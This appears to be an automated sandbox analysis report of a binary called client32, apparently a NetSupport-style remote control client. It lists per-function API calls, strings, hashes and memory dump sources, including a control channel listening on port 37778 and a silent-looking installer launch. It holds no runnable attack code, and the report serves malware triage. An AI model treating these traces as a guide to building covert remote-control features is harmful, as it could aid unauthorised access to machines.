Instruction ID: cb7d4980c5764d39d232efc1c3657fa20eb5a175d35e610bb7c1254f92e5f960
Opcode Fuzzy Hash: 728a32eaeb05f4af535badae1fbf694374bd09ca27186dc10fa6460706712be1
Instruction Fuzzy Hash: C531D335D002259BDB55CF94C880BAEF7B4EB15378F00426DE825A7290DB71BA05CBD2

Function 11027390 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 64COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 11140F70: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11190A88), ref: 11140FDD
Part of subcall function 11140F70: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110C55B), ref: 1114101E
Part of subcall function 11140F70: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114107B

wsprintfA.USER32 ref: 110273BE

Part of subcall function 1113F5D0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110C55B,76938400,?), ref: 1113F667
Part of subcall function 1113F5D0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F687
Part of subcall function 1113F5D0: CloseHandle.KERNEL32(00000000), ref: 1113F68F

wsprintfA.USER32 ref: 110273E8
ShellExecuteA.SHELL32(00000000,open,?,/EM,00000000,00000001), ref: 1102743B

Strings

"%sWINSTALL.EXE", xrefs: 110273B8
/EM, xrefs: 11027428
"%sWINST32.EXE", xrefs: 110273E2
open, xrefs: 11027434

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: File$CreateFolderPathwsprintf$CloseExecuteHandleModuleNameShell
String ID: "%sWINST32.EXE"$"%sWINSTALL.EXE"$/EM$open
API String ID: 816263943-3387570681
Opcode ID: f1cc15f3b484b3060597b65f0298e6d9845af8db0c61c02a3f53ce9c049578f2
Instruction ID: f0eacc969569edd34e5eb124d3fecacac55834f17749586e5d24d44a89e4cf8a
Opcode Fuzzy Hash: f1cc15f3b484b3060597b65f0298e6d9845af8db0c61c02a3f53ce9c049578f2
Instruction Fuzzy Hash: ED11E775E0131AABD750EBB5CC85FAEF7A8DF0470CF5081A5FD15A7185EB30A9008B92

Function 110CB470 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000475), ref: 110CB480
GetWindowTextLengthA.USER32(00000000), ref: 110CB487
_malloc.LIBCMT ref: 110CB491

Part of subcall function 1115F231: __FF_MSGBANNER.LIBCMT ref: 1115F24A
Part of subcall function 1115F231: __NMSG_WRITE.LIBCMT ref: 1115F251
Part of subcall function 1115F231: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F276

GetDlgItemTextA.USER32(?,00000475,00000000,00000001), ref: 110CB4A5
_free.LIBCMT ref: 110CB4B7

Part of subcall function 1115F2C5: HeapFree.KERNEL32(00000000,00000000,?,11167E86,00000000,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F2DB
Part of subcall function 1115F2C5: GetLastError.KERNEL32(00000000,?,11167E86,00000000,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F2ED

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

IsA(), xrefs: 110CB4D5
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110CB4D0

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorHeapItemLastText$AllocateExitFreeLengthMessageProcessWindow_free_mallocwsprintf
String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 428989476-3415836059
Opcode ID: 0c9574f13607a0ab96a8ad53d17372e5969ef69716a891666f14a0e7d3ea3c40
Instruction ID: 8a5c5e8b77e565a35eb081f6e89d0dfd70e8832c022c3d5bb0c80156fd7909ae
Opcode Fuzzy Hash: 0c9574f13607a0ab96a8ad53d17372e5969ef69716a891666f14a0e7d3ea3c40
Instruction Fuzzy Hash: 2201A2BAA001177BC700DB99DC88D9FF7ADEF892983148121F62897200DB34F9158BE2

Function 11003350 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000,00002EFF), ref: 1100335E
GetSubMenu.USER32(00000000,00000000), ref: 1100338A
GetSubMenu.USER32(00000000,00000000), ref: 110033AC
DestroyMenu.USER32(00000000), ref: 110033BA

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

hMenu, xrefs: 11003374
hSub, xrefs: 1100339C
..\CTL32\annotate.cpp, xrefs: 1100336F, 11003397

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 468487828-934300333
Opcode ID: 6be1e2059ece7b9ed383bdda7931d76c13f61f293d7c0d97a9269ad1e6de483e
Instruction ID: aeaffee7d87c1ff1c724bef08b67d3c3b5c76dc351194a7015da3f3258e519f5
Opcode Fuzzy Hash: 6be1e2059ece7b9ed383bdda7931d76c13f61f293d7c0d97a9269ad1e6de483e
Instruction Fuzzy Hash: 59F0E93BF4066A76E61352A66CC5F4FE35C8B81AECF010031F614FA284EE10A80141EB

Function 11003260 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000,00002EF9), ref: 1100326D
GetSubMenu.USER32(00000000,00000000), ref: 11003293
GetMenuItemCount.USER32(00000000), ref: 110032B7
DestroyMenu.USER32(00000000), ref: 110032C9

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

hMenu, xrefs: 11003283
hSub, xrefs: 110032A9
..\CTL32\annotate.cpp, xrefs: 1100327E, 110032A4

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 4241058051-934300333
Opcode ID: 5324a1715833ff6cda70ffa9f26dac184838cc1d76cf7618101d200ddf01ce48
Instruction ID: fe78c9ad8171f01834a46f05afcb0f237af7868451300d88a4665c9a5eaf3718
Opcode Fuzzy Hash: 5324a1715833ff6cda70ffa9f26dac184838cc1d76cf7618101d200ddf01ce48
Instruction Fuzzy Hash: 1DF0E93AF0056B77D21352653C4DF8FF6584B816ACF064031F915B6149EA14640181E6

Function 110ED490 Relevance: 12.1, APIs: 8, Instructions: 129fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,08000080,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 110ED4D3

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 889ce3599226bbc65f74ec40bc3ba49b9f90abd58ce8732ceb5918d6f32d8848
Instruction ID: 84636cbe94183ba309bae942b96445317e215117b627f98e8e2eb235764acfa8
Opcode Fuzzy Hash: 889ce3599226bbc65f74ec40bc3ba49b9f90abd58ce8732ceb5918d6f32d8848
Instruction Fuzzy Hash: 56418472E01215AFD710CFA9C885BAEF7F9EF44315F10856AF956D7240DA74E500CB91

Function 110ED0B0 Relevance: 12.1, APIs: 8, Instructions: 84filememoryCOMMON

Download Yara Rule

APIs

GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,1112E6F6,00000000,?), ref: 110ED0C8
ReadFile.KERNEL32(00000000,00000000,0000000E,?,00000000,?,1112E6F6,00000000,?), ref: 110ED0DD
GlobalAlloc.KERNEL32(00000042,-0000000E,00000000), ref: 110ED0FF
GlobalLock.KERNEL32(00000000), ref: 110ED10C
ReadFile.KERNEL32(00000000,00000000,-0000000E,0000000E,00000000), ref: 110ED11B
GlobalUnlock.KERNEL32(00000000), ref: 110ED12B
GlobalUnlock.KERNEL32(00000000), ref: 110ED145
GlobalFree.KERNEL32(00000000), ref: 110ED14C

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Global$File$ReadUnlock$AllocFreeLockSize
String ID:
API String ID: 3489003387-0
Opcode ID: 053e6924d347b9ac6820ca3d5c81bb3f14130f107e9b2ff0bd63cb7444256e51
Instruction ID: 65e8517cfcc21586bd3fb580135f1203d989b374e789983d102e0d2658aa4c04
Opcode Fuzzy Hash: 053e6924d347b9ac6820ca3d5c81bb3f14130f107e9b2ff0bd63cb7444256e51
Instruction Fuzzy Hash: 1B217432A0111AAFD701DFA9C889BBFB7BCEB85715F1040ABFA16D7140DB74990187A2

Function 1101B1B0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 204libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 110DC4E0: EnterCriticalSection.KERNEL32(111E8064,11018848,33E68B52,?,?,?,111C7D3C,11183F68,000000FF,?,1101A832), ref: 110DC4E1

Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507

std::exception::exception.LIBCMT ref: 1101B3F6
__CxxThrowException@8.LIBCMT ref: 1101B411
LoadLibraryA.KERNEL32(NSSecurity.dll,00000000,111C7D3C), ref: 1101B42E

Part of subcall function 11008D20: std::_Xinvalid_argument.LIBCPMT ref: 11008D3A

Strings

NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B369
NSSecurity.dll, xrefs: 1101B423
NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B38A

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalEnterException@8LibraryLoadSectionThrowXinvalid_argument_malloc_memsetstd::_std::exception::exceptionwsprintf
String ID: NSSecurity.dll$NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
API String ID: 3515807602-1044166025
Opcode ID: 2a586020dff0ed89756f7cbbe5c5c7f92d55e1a61b6993948682d10e073b075d
Instruction ID: d603a471dd2e33d99d4278f6f720d17a0ac61e2c68e0e6a6cc91a0df56390d49
Opcode Fuzzy Hash: 2a586020dff0ed89756f7cbbe5c5c7f92d55e1a61b6993948682d10e073b075d
Instruction Fuzzy Hash: 75716FB5D00349DFEB10DFA8C884BDDFBB4AF05318F508159E825AB381EB75AA45CB91

Function 1101F130 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1101F1A1

Part of subcall function 11140F70: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11190A88), ref: 11140FDD
Part of subcall function 11140F70: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110C55B), ref: 1114101E
Part of subcall function 11140F70: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114107B

SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,00000000), ref: 1101F2B5
GetSaveFileNameA.COMDLG32(?), ref: 1101F2D7
_fputs.LIBCMT ref: 1101F303

Strings

X, xrefs: 1101F1B1
ChatPath, xrefs: 1101F291

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FolderPath$FileName$ModuleSave_fputs_memset
String ID: ChatPath$X
API String ID: 2661292734-3955712077
Opcode ID: c9d1167305944222c3b812ed212865b521ec1b37c4121ec4c8f310dd89108d80
Instruction ID: 57ff07f2a651e70645d467a760abd372366bc5bc768b787ed0d323a481320c6b
Opcode Fuzzy Hash: c9d1167305944222c3b812ed212865b521ec1b37c4121ec4c8f310dd89108d80
Instruction Fuzzy Hash: 8B51B275D043299FEB21DB60CC44BDEBBB4AF45708F1041D9D9096B284EB75AA84CB91

Function 110DB2F0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

Part of subcall function 110D5D90: __CxxThrowException@8.LIBCMT ref: 110D5E13
Part of subcall function 110D5D90: gethostbyname.WSOCK32(0.0.0.0,33E68B52,?,?,00000000), ref: 110D5E25
Part of subcall function 110D5D90: WSAGetLastError.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,111830EB), ref: 110D5E31
Part of subcall function 110D5D90: _memmove.LIBCMT ref: 110D5E5B
Part of subcall function 110D5D90: htons.WSOCK32(00000000), ref: 110D5E81
Part of subcall function 110D5D90: socket.WSOCK32(00000002,00000001,00000000), ref: 110D5E95
Part of subcall function 110D5D90: WSAGetLastError.WSOCK32 ref: 110D5EA3

OutputDebugStringA.KERNEL32(NsAppSystem Info : Control Channel Stopped Listening for Connections (37778) ListenThread Terminating)...,?,00000000,?,?,00000000), ref: 110DB378

Part of subcall function 110DC4E0: EnterCriticalSection.KERNEL32(111E8064,11018848,33E68B52,?,?,?,111C7D3C,11183F68,000000FF,?,1101A832), ref: 110DC4E1

Strings

NsAppSystem Info : Control Channel Listening for Connections..., xrefs: 110DB326
NsAppSystem Info : Stopped Listening On Control Channel For Connections..., xrefs: 110DB366
NsAppSystem Info : Control Channel Stopped Listening for Connections (37778) ListenThread Terminating)..., xrefs: 110DB373
NsAppSystem Info : Control Channel Connected To NsStudent App..., xrefs: 110DB42A
NsAppSystem Info : INCOMING Control Channel Connection..., xrefs: 110DB39C

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$CriticalDebugEnterException@8OutputSectionStringThrow_memmovegethostbynamehtonssocket
String ID: NsAppSystem Info : Control Channel Connected To NsStudent App...$NsAppSystem Info : Control Channel Listening for Connections...$NsAppSystem Info : Control Channel Stopped Listening for Connections (37778) ListenThread Terminating)...$NsAppSystem Info : INCOMING Control Channel Connection...$NsAppSystem Info : Stopped Listening On Control Channel For Connections...
API String ID: 2962855875-3381136194
Opcode ID: 470dfb31520a60e64f462a3d3d25fb54ba4a5701629357e6edeca2e845a4fbbc
Instruction ID: e2715c33eb21191a3dfbb02b9cbbcab3febe3a6cedbf12ae552ebbd69860b1d5
Opcode Fuzzy Hash: 470dfb31520a60e64f462a3d3d25fb54ba4a5701629357e6edeca2e845a4fbbc
Instruction Fuzzy Hash: 0131BF75E01795EFDB00DBE4D880AAEFBB0FF45708F10806DE4169B240EA316A00CBA2

Function 110EB0D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,?), ref: 110EB121
_free.LIBCMT ref: 110EB13C

